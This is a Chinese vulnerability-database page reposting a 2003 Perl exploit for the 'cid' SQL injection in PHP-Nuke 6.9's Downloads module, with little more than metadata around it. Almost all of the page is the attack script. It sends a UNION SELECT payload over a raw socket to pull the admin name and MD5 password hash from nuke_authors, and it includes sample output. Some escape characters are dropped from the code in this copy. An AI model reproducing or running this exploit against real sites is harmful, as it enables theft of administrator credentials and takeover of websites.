PHP-Nuke 6.9 – ‘cid’ SQL Injection

PHP-Nuke 6.9 – ‘cid’ SQL Injection

漏洞ID 1054317 漏洞类型
发布时间 2003-12-21 更新时间 2003-12-21
图片[1]-PHP-Nuke 6.9 – ‘cid’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-PHP-Nuke 6.9 – ‘cid’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/138
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl -w
use IO::Socket;

########################################
## THIS CODE PUBLIC NOW  =)))        ##
########################################
## __________               ___ ___   ##
## ______   __ __  ______/   |     ##
##  |       _/  |  /  ___/    _     ##
##  |    |     |  /___ \         / ##
##  |____|_  /____//____  >___|_  /  ##
##         /           /       /   ##
########################################
## based on 'cid' sql injection vuln
## in Download module, more info about
## this vuln u can see here:
## http://rst.void.ru/texts/advisory10.htm
########################################
## work only on mysql version > 4.0
########################################
## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
## C:>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
##
## server : 127.0.0.1
## folder : /phpnuke/
## aid    : admin
##
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] success
## [~] wait for reply...
## [+] w00t...
## [+] USER: admin
## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
##
########################################

if (@ARGV < 3)
{
print "#############################################################n";
print " r57nuke-cid.pl - PHP-NUKE 'cid' sql injection exploitn";
print " by RusH security team // www.rsteam.ru , http://rst.void.run";
print " coded by 1dt.w0lf // [email protected] // 17.09.2003n";
print "#############################################################n";
print " Usage:n";
print " r57nuke-cid.pl <host> </folder/> <aid>n";
print "n";
print " <host> - host for attackn";
print " </folder/> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )n";
print " <aid> - user aid , nick ( admin , blabla )n";
print "#############################################################";
exit();
}

$server = $ARGV[0];
$folder = $ARGV[1];
$aid = $ARGV[2];

print "n";
print "server : $servern";
print "folder : $foldern";
print "aid    : $aidn";
print "n";
$success = 0;
$path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20
UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
$GET = $folder . $path_download;
print "[~] prepare to connect...n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || 
die "[-] connect failedn";
print "[+] connectedn";
print "[~] prepare to send data...n";
print $socket "GET $GET HTTP/1.1n";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "Http-Referer: http://microsoft.comn";
print $socket "User-Agent: Internet Explorer 6.0n";
print $socket "Pragma: no-cachen";
print $socket "Cache-Control: no-cachen";
print $socket "Connection: closenn";
print "[+] successn";
print "[~] wait for reply...n";
while ($answer = <$socket>)
{
 #print "$answer";
 if ($answer=~/(&cid=)(w)("><b>)($aid)(</b></a></font>)(.{0,20})
(<font class="content">)(.{32})(</font>)/)
 {
 $success = 1;
 print "[+] w00t...n";
 print "[+] USER: $1 n[+] MD5 HASH: $6n";
 }
}
if ($success == 0) { print "[-] exploit failed =(n"; }

# milw0rm.com [2003-12-21]

相关推荐: SCO OpenServer未知漏洞

SCO OpenServer未知漏洞 漏洞ID 1204959 漏洞类型 未知 发布时间 2001-12-31 更新时间 2001-12-31 CVE编号 CVE-2001-1578 CNNVD-ID CNNVD-200112-154 漏洞平台 N/A CVS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享